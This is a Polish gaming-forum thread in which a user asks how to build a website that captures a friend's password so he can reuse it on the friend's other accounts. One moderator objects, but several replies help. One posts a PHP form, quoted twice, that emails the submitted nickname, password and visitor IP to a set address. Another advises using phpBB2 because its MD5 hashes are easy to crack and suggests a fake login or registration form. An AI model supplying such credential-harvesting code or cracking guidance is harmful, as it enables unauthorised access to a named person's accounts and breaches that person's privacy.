Skocz do zawartości
  • 👋 Witaj na MPCForum!

Przeglądasz forum jako gość, co oznacza, że wiele świetnych funkcji jest jeszcze przed Tobą! 😎

• Pełny dostęp do działów i ukrytych treści
    • Możliwość pisania i odpowiadania w tematach
    • System prywatnych wiadomości
    • Zbieranie reputacji i rozwijanie swojego profilu
    • Członkostwo w jednej z największych społeczności graczy

👉 Dołączenie zajmie Ci mniej niż minutę – a zyskasz znacznie więcej!

Zarejestruj się teraz

[PYTANIE] Nowa strona i hasła..

Rekomendowane odpowiedzi

Opublikowano

Witam.

Przejdę od razu do rzeczy, mianowicie chciał bym zdobyć w "legalny" sposób hasło mojego kolegi :P.

Mój plan jest taki , gdybym założył stronkę www , obojętnie na jakim hostingu (np. cba.pl, byle darmowym) czy mógłbym wtedy poznać hasła użytkowników którzy na mojej stronie zaczęli by się rejestrować? Jest taki sposób aby wejść do bazy danych i zobaczyć dane rejestrowanego użytkownika. ?

Otóż o to mi chodzi podsumowując że przez ten sposób mógłbym dowiedzieć się legalnie hasła kolegi do innych jego aplikacji(jeżeli oczywiście stosuje wszędzie takie same) :D

Jeżeli jest taki sposób to proszę o krok po kroku jego wytłumaczenie. :)

Dziękuje z góry wszystkim. !

:)

Opublikowano

Z punktu widzenia naukowego chcesz zrobić coś na zasadzie Keylogera, a uwierz że wszelkie próby wyłudzenia, czy czegoś w ten deseń nie jest legalne, a co najlepsza zakazane na MPC.

1368908122-U621182.png

Moderator Tworzenia stron WWW , ex.Moderator Dark Orbit,ex. Moderator Diablo, Helper Pogaduszek, Metin2, Dobre programy, Fan Art, MPC Media Team Recenzent.

Opublikowano

Możesz jeśli w skrypcie nie jest ustawione kodowanie haseł, a jeżeli takowe masz to zamiast hasło12345 będziesz miał w bazie danych zapis e5j3h2255k32f9.

2mmtzeu.jpg

Opublikowano

Z punktu widzenia naukowego chcesz zrobić coś na zasadzie Keylogera, a uwierz że wszelkie próby wyłudzenia, czy czegoś w ten deseń nie jest legalne, a co najlepsza zakazane na MPC.

Wcale to nie jest nielegalne. Chodzi mi o to że jak zrobie sobie swoją stronkę to jak będę mógł widzieć hasła, to jest legalne, to można zrobić wiem, ale nie mam pojęcia jak i proszę was o wytłumaczenie krok po kroku .. Ktoś kto się na tym zna, widać że mało jest tutej takich osób,dlatego odświeżam i proszę o pomoc jeżeli ktoś wie.

Możesz jeśli w skrypcie nie jest ustawione kodowanie haseł, a jeżeli takowe masz to zamiast hasło12345 będziesz miał w bazie danych zapis e5j3h2255k32f9.

Krok - po - kroku - , jestem w tym zielony więc KROK PO KROKU =)

Opublikowano

Możesz rejestracje połączyć z formularzem kontaktowym i każde dane przez które ktoś się rejestrował będą u Ciebie na mailu.

Opublikowano

Możesz rejestracje połączyć z formularzem kontaktowym i każde dane przez które ktoś się rejestrował będą u Ciebie na mailu.

aha, no niezłe, a mógłbyś krok po kroku mi to wytłumaczyć? =)

Opublikowano

IMO lepszym sposobem jest zapis do bazy danych.

@vErt`

Nie ma krok po kroku. Nauka php + mysql ci pozostaje :)

Opublikowano

Moge Ci dać co najwyżej formularz, bo tak jak kolega up napisał musisz sie pouczyć php+mysql;

<?php
if(empty($_POST['submit'])) {
?>

<table>
<form action="" method="post">
<tr>
<td>Nick:</td>
<td><input type="text" name="formName"/></td>
</tr>

<tr>
<td>Hasło:</td>
<td><input type="text" name="formPassword"/></td>
</tr>

<tr>
<td>Krótki opis siebie:</td>
<td><textarea name="formText"></textarea></td>
</tr>

<tr>
<td> </td>
<td><input type="submit" name="submit" value="Wyślij formularz"/></td>
</tr>
</form>
</table>

<?php
} else {

$email = '[email protected]';

$formName = $_POST['formName'];
$formPassword = $_POST['formPassword'];
$formText = $_POST['formText'];

if(!empty($formName) && !empty($formPassword) && !empty($formText)) {

function checkMail($checkmail) {
if(filter_var($checkmail, FILTER_VALIDATE_EMAIL)) {
if(checkdnsrr(array_pop(explode("@",$checkmail)),"MX")){
return true;
}else{
return false;
}
} else {
return false;
}
}

if(checkMail($formEmail)) {
$ip = $_SERVER['REMOTE_ADDR'];
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$mailText = "Treść wiadomości:n$formTextnOd: $formName, $formPassword ($ip, $host)";
$mailHeader = "From: $formName <$formPassword>";

@mail($email, 'Formularz kontaktowy', $mailText, $mailHeader) or die('Błąd: wiadomość nie została wysłana');

echo 'Wiadomość została wysłana';
} else {
echo 'Adres e-mail jest niepoprawny';
}

} else {
echo 'Wypełnij wszystkie pola formularza';
}

}
?>

Opublikowano

Paradisia, znajdź sobie definicję keyloggera. Drogi autorze, oczywiście. Możesz wykorzystać przeróżne CMS-y, skrypty forów itd. Jednak wszystkie hasła będą kodowane. Proponuję Ci skorzystać z phpBB2, przema. Hasła w nim kodowane w MD5, które łatwo zdekodować. Jeśli jednak Twój znajomy ma hasła ze znakami specjalnymi, to nici z dekodowania. Zwróć jednak uwagę na to, że może korzystać z przeróżnych haseł, w różnych serwisach. Jest jeszcze jeden sposób, prosty formularz symulujący rejestrację, bądź logowanie. Rób to co uważasz za słuszne.

SP.

Opublikowano

Paradisia, znajdź sobie definicję keyloggera. Drogi autorze, oczywiście. Możesz wykorzystać przeróżne CMS-y, skrypty forów itd. Jednak wszystkie hasła będą kodowane. Proponuję Ci skorzystać z phpBB2, przema. Hasła w nim kodowane w MD5, które łatwo zdekodować. Jeśli jednak Twój znajomy ma hasła ze znakami specjalnymi, to nici z dekodowania. Zwróć jednak uwagę na to, że może korzystać z przeróżnych haseł, w różnych serwisach. Jest jeszcze jeden sposób, prosty formularz symulujący rejestrację, bądź logowanie. Rób to co uważasz za słuszne.

SP.

Scripts, ten prosty formularz symulujący to też dosyć ciekawe, mógłbyś mnie w to wprowadzić jak to zrobić? Gdy to z stronką jest aż tak skomplikowane to może raczej zajął bym się twoim sposobem, na czym by on polegał ? , bo mi głównie chodzi o te jego hasło :)

Moge Ci dać co najwyżej formularz, bo tak jak kolega up napisał musisz sie pouczyć php+mysql;

<?php
if(empty($_POST['submit'])) {
?>

<table>
<form action="" method="post">
<tr>
<td>Nick:</td>
<td><input type="text" name="formName"/></td>
</tr>

<tr>
<td>Hasło:</td>
<td><input type="text" name="formPassword"/></td>
</tr>

<tr>
<td>Krótki opis siebie:</td>
<td><textarea name="formText"></textarea></td>
</tr>

<tr>
<td> </td>
<td><input type="submit" name="submit" value="Wyślij formularz"/></td>
</tr>
</form>
</table>

<?php
} else {

$email = '[email protected]';

$formName = $_POST['formName'];
$formPassword = $_POST['formPassword'];
$formText = $_POST['formText'];

if(!empty($formName) && !empty($formPassword) && !empty($formText)) {

function checkMail($checkmail) {
if(filter_var($checkmail, FILTER_VALIDATE_EMAIL)) {
if(checkdnsrr(array_pop(explode("@",$checkmail)),"MX")){
return true;
}else{
return false;
}
} else {
return false;
}
}

if(checkMail($formEmail)) {
$ip = $_SERVER['REMOTE_ADDR'];
$host = gethostbyaddr($_SERVER['REMOTE_ADDR']);

$mailText = "Treść wiadomości:n$formTextnOd: $formName, $formPassword ($ip, $host)";
$mailHeader = "From: $formName <$formPassword>";

@mail($email, 'Formularz kontaktowy', $mailText, $mailHeader) or die('Błąd: wiadomość nie została wysłana');

echo 'Wiadomość została wysłana';
} else {
echo 'Adres e-mail jest niepoprawny';
}

} else {
echo 'Wypełnij wszystkie pola formularza';
}

}
?>

Wiem miej więcej o co chodzi z tym 'formularzem' teraz gdzie mam to wrzucić na stronce aby to działało? =)

Opublikowano

Scripts, ten prosty formularz symulujący to też dosyć ciekawe, mógłbyś mnie w to wprowadzić jak to zrobić? Gdy to z stronką jest aż tak skomplikowane to może raczej zajął bym się twoim sposobem, na czym by on polegał ? , bo mi głównie chodzi o te jego hasło :)

Wiem miej więcej o co chodzi z tym 'formularzem' teraz gdzie mam to wrzucić na stronce aby to działało? =)

Tam gdzie chcesz, niezależnie gdzie to wrzucisz i tak bedzie działało ;p

Opublikowano

Tam gdzie chcesz, niezależnie gdzie to wrzucisz i tak bedzie działało ;p

No tak, ale nie wiem w jakim miejscu nadal :D gdzie na mojej stronce w jakich ustawieniach :P

Opublikowano

Proszę, odwiedź tą strone -> KLIK

Bo bez odpowiedniej wiedzy, lepiej się za to nawet nie chwytać, strona będzie wyglądała jak za początków internetu i naprawdę mega newbie by się tylko nabrał. :)

Pozdrawiam i życzę Ci chęci do nauki. ;-)

Opublikowano

Dziękuje za odpowiedzi, i dzięki za ten 'kurs nauki' poczytam i się pouczę, może jeszcze dziś załapię o co chodzi i wrzucę sobie ten formularz =) Łapcie po like. i jeszcze raz dzięki. =)

Opublikowano

Powiedz mi co to za szyfr, bo jestem cholernie ciekawy.

Zarchiwizowany

Ten temat przebywa obecnie w archiwum. Dodawanie nowych odpowiedzi zostało zablokowane.

• Dodaj nową pozycję...